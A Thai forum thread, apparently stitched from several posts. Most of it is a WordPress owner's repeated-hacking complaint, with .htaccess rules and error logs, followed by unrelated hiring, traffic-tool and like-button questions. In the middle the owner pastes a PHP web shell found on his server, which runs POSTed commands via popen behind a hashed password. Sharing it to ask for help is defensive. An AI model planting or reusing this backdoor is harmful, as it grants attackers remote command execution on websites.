ตัวอย่างโค๊ดที่โดนฝัง LIMIT POST อ่านแล้วงง
เป็นโค๊ดยังไงครับ เดียวผมจะได้นำไปแปะ ขอละเอียดนิดนึงครับ

ล่าสุด jetpack ใช้ไม่ได้นะครับ ขึ้น error 404  
และก็อย่างที่ตอบไปอะครับ เรื่อง pesmission 744 ไม่น่าเกี่ยวครับ เพราะของผมเป็น 644 บอกไปแล้วนิครับ   

สำหรับ server ผมใช้ hostgator dedicated server ครับ 

ขออนุญาติตอบเป็นข้อๆ ไปนะครับ
-สำหรับวิธีที่แนะนำมาเกี่ยวกับการลบ pass และเปลี่ยน มันก็แค่ยืดเวลาออกไปเช่นกัน สุดท้ายก้เจาะได้อยุ่ดีครับ ลองมาหลายรอบละ แต่เห็นเวปนอกเค้าบอกให้เปลี่ยน 90 วัน ต่อ 1 ครั้ง

-ถัดมานะครับที่บอก permission ไม่น่ามีปัญหาเพราะผมจัดการเป็น644 หมดละ แต่ที่ผมบอกว่ากันไม่อยู่ก็เพราะ พวกนี้มันเจาะรหัสโดยการสร้างไฟล์ขึ้นมา เช่น wp-mod.php พอเข้าไปอ่านก็มีการแก้ โค๊ด ตั้งแต่ สร้างระบบสมัครสมาชิกเอง และซ่อนไว้ไม่ให้โชว์แสดงผล ไม่ก็แก้โค๊ดนั้นนู้นนี้ เพื่อเปิด permission ผมไม่รู้ว่าทำไงนะ แต่ผมโดนมาละ พวกรัสเซียนี้เลยตัวเก่ง บางทีก็เข้าไปใน wp-cron ไรพวกนี้ ดังนั้น ผมเลยคิดว่า การสร้างไฟล์ htaccess มันน่าจะเซฟกว่า เพราะตอนนี้ยังไม่โดนนะครับ แต่คิดว่าเดียวมันคงทำได้อีก

-และก็ plugin เวปผมก็เป็นตัวพวกทั่วๆไป จะบอกว่ามี 6-7 ปลั๊กอิน แต่ครับ ย้ำ แต่ๆๆๆ มันก็ยังพยายามเข้ามาแก้ไขไฟล์ของผม ผมเลยใช้วิธี ที่คล้ายกับคุณ sMongPed มันเลยแก้ไขไม่ได้ แต่ผมก็ไม่อยากชะล่าใจนัก เพราะสิ่งที่เห็นอาจจะไม่ใช่อย่างที่คิด เพราะที่แน่ๆ โดนเจาะเข้ามาละครับ เหมือนพยาธิดีๆ

-อ่าผมอยากจะถามพอดีสำหรับคุณ sMongPed ส่งโค๊ดมา ขอบคุณมาก อยากทราบว่ามันเหมือนกับอันนี้ของคุณ NaiTan มั้ยครับ หรือว่าของคุณครอบจักรวาลกว่า ?
<Files *.php>
Order Deny,Allow
Deny from all
Allow from 127.0.0.1
</Files>

<Files index.php>
Order Allow,Deny
Allow from all
</Files>

-ส่วนวิธีที่ว่าให้แก้ไข ftp ในส่วนของ pass ขอทำความเข้าใจก่อนนะครับ เท่าที่ผมเข้าใจคือ cpanel กับ ftp จะใช้รหัสตัวเดียวกันใช่มะครับ ซึ่งผมทำการเปลี่ยนรหัสในส่วนของ cpanel แล้วครับผม แต่ในความรู้สึกของผม ผมก็คิดว่าน่าจะเข้ามาจากทางนี้เหมือนกัน ดังนั้นใครพอมีวิธีเปลี่ยน pass ของ ftp บอกผมหน่อยนะครับ ผมลองใช้ cpanel แล้วมันไม่มีให้กดเปลี่ยนเฉพาะไฟล์

-สำหรับในส่วนของ ปลั๊กอิน เดียวผมกำลังจะลองลงนะครับ ตัว All in one ขอบคุณตัวนี้มาก

-และวิธีของคุณ tenzamak คือ อย่างที่บอกครับ มันสามารถสมัครสมาชิกของมันได้เอง ตั้งตัวเองเป็น admin และซ่อนไม่แสดงผล แต่ไม่รู้ทำไมเหมือนกันครับ ว่าพวกนี้จะลบข้อมูล post ไม่ได้ ถ้าลบได้ก็จะไปกองอยู่ในส่วนของ ถัังขยะ ไม่หายไปเลย ซึ่้งข้อมูลนี้เป็นข้อมูลล่าสุด แต่ผมเคยเจอแบบหนักกว่านี้ คือ มาลบบทความผมไปเลย

ปล.สำหรับเพื่อนๆที่ยังไม่เคยเจอกรณีแบบผม ก็เข้ามาศึกษาได้นะครับ และสุดท้ายนี้ นี้คือ โค๊ดส่วนหนึ่งที่ผมโดน hack ลองไปแปลดุว่าคือไร (อยากจะบอกว่าตัวนี้สั้น เคยโดนยาวกว่านี้ เดียวไว้เอามาลงให้ดู)
<?php if(isset($_POST["hash"]) and @md5($_POST["hash_access"]) == "5651899bce466094a582e8d95ba5ad71"){$fp = popen($_POST["code"], "r"); while (!feof($fp)) {echo fgets ($fp, 1024);}  fclose($fp); die;} ?>

iThemes Security เคยลองลงละครับ นี้ไม่ได้ช่วยเลยครับ เป็นตัวทำให้ hacker โกด ถล่มเวปผมราปเปนหน้ากองเลยครับ - - มันแค่ทำให้เข้ายากมากขึ้นเฉยๆ อยากได้แบบปรับพวก htaccess ไม่ก็ โค๊ดอะไรก็ได้ ซ่อนไฟล์พวก wp-content wp-include wp-admin พวกนี้ กันไม่ให้มันเห็นหรือทำให้เราใช้งานได้คนเดียว มีมะครับ ที่เขียนเป็น htaccess

คือ อย่างที่บอกไงครับ มีตัว backup อยุ่แล้ว แต่เดียวมันก้มาเจาะใหม่ ผมอยากได้วิธีป้องกัน แก้ปัญหาถาวรอะครับ

ตอนนี้ใช้ hostgator อะครับ ผมได้ลองไล่ดูละนะครับ เจอประมาณนี้ ในส่วนของ error_log

PHP Warning:  Cannot modify header information - headers already sent by public_html/wp-content/plugins/download-manager/functions.php:445
 PHP Warning:  mysql_real_escape_string() expects parameter 1 to be string, array given in public_html/wp-includes/wp-db.php on line 1036

ผมลองเชคดูไฟล์เทียบกับตัวเก่าที่ backup ก้เหมือนเดิม ไม่รู้จะหาไงละคับ ลองเอาโต๊ดเปรียบเทียบก้เหมือนเดิม ปวดหัวจริงครับ

อะไรทำนองนี้ ขึ้นมาเยอะแยะเลย งงมากครับ ผมอยากได้วิธีป้องกันอะครับ แบบซ่อนไฟล์ไปเลยได้มั้ย หรือ block ให้เข้าได้แค่ ip ของผมไรอย่างนี้ มีวิธีไหนทำได้บ้างปะครับ

อาจจะเขียนเวอร์ไปหน่อยแต่ มันแฮคผมเข้ามาบ่อยมาก ผมก็แก้ๆ มันก็แฮคอีก ตอนนี้เลยทำ htaccess ผมก้กันเต็มที่ แต่ก้ยังจะโดน

และก็ชอบโดน hack มานเจาะไปที่ wp-content/upload บ้าง wp-includes/wp-db.php ล่าสุด โดน ไปที่ plugin

ไม่ทราบว่ามีวิธีการบล๊อคไม่ให้คนอื่นเข้าไฟล์ พวกนี้ได้รึเปล่าครับ ผมโดนจนหงิงละ

ไม่รู้กันยังไงละคับ หรือมี code ที่ต้องใส่ htaccess เพิ่มรึเปล่า ผมไม่รู้จะกันไง

ออลืมบอก บางครั้งมันชอบเอาไฟล์ wp-mod.php มาใส่ในเวปผม ผมก็ลบออกตลอด ช่วยผมที

ทำ youtube จบ เพราะหลายคนก็ดังจาก youtube นี้แหละ

ผมกำลังมองหาคนที่สามารถทำ wordpress และทำส่วนโพสคล้ายกับ เวป 9gag, twitter
ตอนนี้มีเวปเรียบร้อยแล้วเหลือแต่ขั้นตอนลงมือทำในส่วนของระบบโพส และสมาชิกโดยให้สมาชิกโพส และสมัครผ่าน fb หรือพูดง่ายๆก็คือให้ช่วยโมเวปให้นั้นเองครับ

ปล. ลองทำดูก่อนครับแล้วตกลงราคากันได้เลย pm มาเลยครับ แล้วแต่สะดวก ขอบคุณครับ

จากที่ผมทำการศึกษาข้อมูลอย่างจริงจัง พบว่ามันเป็นเพียง traffic ปลอมครับ คือเหมือนกับ bot อะครับ เข้ามาก็ไม่มีผลใดๆ แถมยังพ่วงมากับไวรัส ดังนั้นถ้าใครจะใช้แนะนำให้ติด Eset ป้องกันไวรัสด้วยนะครับ

รอฟังด้วยครับ

ผมเลิกใช้ไปแล้ว ถ้าอยากให้ได้ผลดีจริงๆ ต้องเสียตังค์ซื้อนะครับ ผมว่ามันจะไม่ค่อยล่ม ความคิดส่วนตัวนะ ไม่รู้จริงแท้ประการใด เพราะยังไม่เคยซื้อ แต่เวลานี้คือเลิกใช้ไปแล้ว

เก็บก่อนละกัน

ขอบคุณคร๊าบบบ ขอเก็บ

ออมีประโยชน์

แลดูมีเอกลักษณ์ดี แต่เหมือนขาดไรไปอย่างน้าาาา อะไรหนอ

มาเก็บด้วยคน

ครับผม ไม่ใช่ like fanpage

สวัสดีครับ พอดีผมมีปัญหาเกี่ยวกับ การเขียน Function Code php คือไม่เข้าใจอยู่ตรงที่เดียว ซึ่งแต่ก่อนเคยทำได้ พอตอนนี้ก็ลืมไปแล้ว
ผมต้องการทราบวิธีการ วาง ปุ่ม Like Facebook / google / twitter ไว้ที่หน้าแรก (หน้า Home หรือ Index)
และวิธีการ เอา View count ตัวนับคนเข้า ไปแปะหน้าแรก...ผมคิดว่าน่าจะเป็นเรื่องเดียวกันนะครับ ยังไงฝากพี่ๆ น้องๆ ช่วยหน่อยครับ

ผมได้พยายามทำเกี่ยวกับเรื่องนี้อยู่หลายครั้งแต่ก็ล้มเหลว
ปัญหาที่พบคือ
1. เมื่อเปิดหน้าแรกและนำ Code ไปวาง ปรากฏว่า มันโชว์ให้หมดเลยนะครับ เพียงแต่ เมื่อเรากด like บทความที่ 2,3,4...ก้ like ไปด้วย.
ซึ่งเมื่อเปิดดูเนื้อหาข้างใน พบว่าไม่มี Like ปรากฏอยู่
2. อีกกรณี สำหรับตัวนับจำนวนคนเข้าเวป, ผมพบปัญหาคือ เมื่อเอาไปแปะ เช่น คนเข้าชม 5 คน / บทความที่ 2,3,4...กลับไม่ขึ้น ขึ้นอันเดียว

พอดีเด็กใหม่อะครับ พึ่งหัดใช้ smf ผมพยายามค้นหาข้อมูลแต่ก็ไม่เจอที่ตรงเลย เลยอยากสอบถามว่าถ้าหากผมต้องการเปลี่ยน หน้าตาหน้าแรกให้โชว์แสดงบทความทำไง, ถ้าให้มันลิงค์เวป กับ wordpress ทำไง, จะเปลี่ยน theme ให้มีหน้าตาคล้าย wordpress ที่เราได้ทำบทความ ทำยังไง...

ถ้าคำถามงงหรือสับสนต้องขออภัยนะครับ